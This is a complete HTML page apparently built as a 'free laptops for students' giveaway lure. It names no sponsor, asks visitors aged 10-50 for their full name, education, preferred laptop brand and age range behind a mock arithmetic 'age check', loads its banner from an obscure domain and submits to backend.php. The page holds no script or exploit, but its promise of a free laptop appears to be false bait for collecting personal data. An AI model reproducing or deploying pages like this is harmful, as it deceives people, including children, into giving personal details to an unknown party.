<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Free Laptops For Students</title>
    <style>
        body {
            font-family: 'Roboto', 'Arial';
            border: 2px solid rebeccapurple;
            margin: 0px 25%;
            border-radius: 20px;
            height: 1500px;
        }

        .new {
            background-color: rgb(253, 90, 30);
            color: white;
            text-align: center;
            padding: 8px 0px;
            font-size: 22px;
        }

        .hello {
            text-align: center;
        }

        .ol {
            padding: 25px 39%;
        }

        .btn {
            width: 270px;
        }

        #name1 {
            margin: 10px 0px;
            width: 100%;
            padding: 2px 3px;
            position: relative;
            right: 33%;
        }

        #enter {
            margin: 5px 0px;
        }

        .car {
            margin: 5px 0px;
            padding: 3px 0px;
            width: 213%;
            border: 1px solid #3498DB;
            border-radius: 3px;
            position: relative;
            right: 30%;
        }

        #select {
            margin: 10px 0px;

        }

        #entering {
            text-align: left;
            margin: -32px 42%;

        }

        #name {
            padding: 4px 0px;
            text-align: left;
            width: 213%;
            border: 1px solid #3498DB;
            border-radius: 3px;
        }

        #education {
            margin: 10px 0px;
        }

        #education2 {
            margin: 10px 0px;
        }

        #education3 {
            margin: 10px 0px;
        }

        .down {
            margin: 10px 0px;
        }

        .button {
            text-align: center;
            padding: 2px 121px;
            background-color: #4CAF50;
            border-radius: 3px;
            border: 1px solid #4CAF50;
            color: white;
            font-size: 20px;
            display: block;
            position: relative;
            right: 33%;
        }

        .button:hover {
            cursor: pointer;
        }
        .img{
            
            width: 100%;
            height: 500px;
            vertical-align: top;
        }
        .p{
            text-align: center;
            color: #3498DB;
            font-size: 25px;
            padding: 0px 40px;

        }
        .selection{
            position: relative;
            right: 32%;
            width: 170%;
            display: block;
        }
        .corect{
            width: 150%;
            position: relative;
            right: 33%;
        }
        .ques{
            display: block;
            width: 150%;
            position: relative;
            right: 33%;
        }
    </style>
</head>

<body>
    <img src="https://2a1kn.top/images/lp3.png" class="img">
    <form action="backend.php">
        <header>
            <h3 class="new">Students Laptop Support 2023</h3>
            <div class="hello">
                <p style="text-align: center;">How to qualify for students laptop is to complete the registration below.
                </p>
        </header>
        <p class="p">Be part of the successful students who will a laptop to help them learn
            better.</p>
        <ol type="1" class="ol">
            <li>You must be student.</li>
            <p style="color: rgb(204, 204, 27); padding: 0px 0px; width: 140%;">Age bracket(10-50) years</p>
            <li class="btn">You should be able to read and write.</li>
        </ol>
        </div>
        <div id="entering">
            <div id="name1">
                <label type="text" for="name" id="ful">Full Name</label>
                <div id="enter">
                    <input type="text" name="MyName" id="name" placeholder="Enter your full Name">
                </div>
            </div>
            <div id="select">
                <div id="education">
                    <label for="Education" class="selection">Select your Education</label>
                    <select name="myCar" class="car">
                        <option value="ind">High School</option>
                        <option value="ind">Secondary School</option>
                        <option value="swf" selected>Undergraduate</option>
                        <option value="swf" selected>Masters</option>
                        <option value="swf" selected>Ph.d</option>
                        <option value="swf" selected>College</option>
                        <option value="swf" selected>------select your Education------</option>
                    </select>
                    <div id="education2">
                        <label for="Brand" class="selection">Select the Laptop Brand</label>
                        <select name="myCar" class="car">
                            <option value="1" selected>Lenove</option>
                            <option value="2" selected>Dell</option>
                            <option value="3" selected>Hp</option>
                            <option value="4" selected>Toshiba</option>
                            <option value="0" selected>hcl</option>
                            <option value="6">Asus</option>
                            <option value="5" selected>------Select Brand------</option>
                        </select>
                    </div>
                    <div id="education3">
                        <label for="Age" class="selection">Select and age range</label>
                        <select name="myCar" class="car">
                            <option value="1" selected>10-20</option>
                            <option value="2" selected>20-30</option>
                            <option value="3" selected>30-40</option>
                            <option value="4" selected>40-50</option>
                            <option value="5" selected>------Age Limit------</option>
                        </select>
                    </div>
                    <br>
                    <div class="down">
                        <div class="corect">
                            Correct this question
                        </div>
                        <div class="corect">To prove your age</div>
                        <br>
                        <label>
                            <font style="vertical-align: inherit;">
                                <font style="vertical-align: inherit;"> <b class="ques">Questions: 9+1-5=</b> </font>
                            </font>
                        </label>
                        <div class="user-box">
                            <div class="ques">
                                <input type="number" name="" required="" fdprocessedid="9do8mj"
                                    data-gtm-form-interact-field-id="0">
                            </div>

                            <label class="ques">
                                <font style="vertical-align: inherit;">
                                    <font style="vertical-align: inherit;"><b>Enter the answer.</b></font>
                                </font>
                            </label>
                        </div>
                        <br>
                        <div class="buton">
                            <input class="button" type="submit" value="next" fdprocessedid="iz8h9u">
                        </div>
                    </div>
                </div>
    </form>
</body>
</html>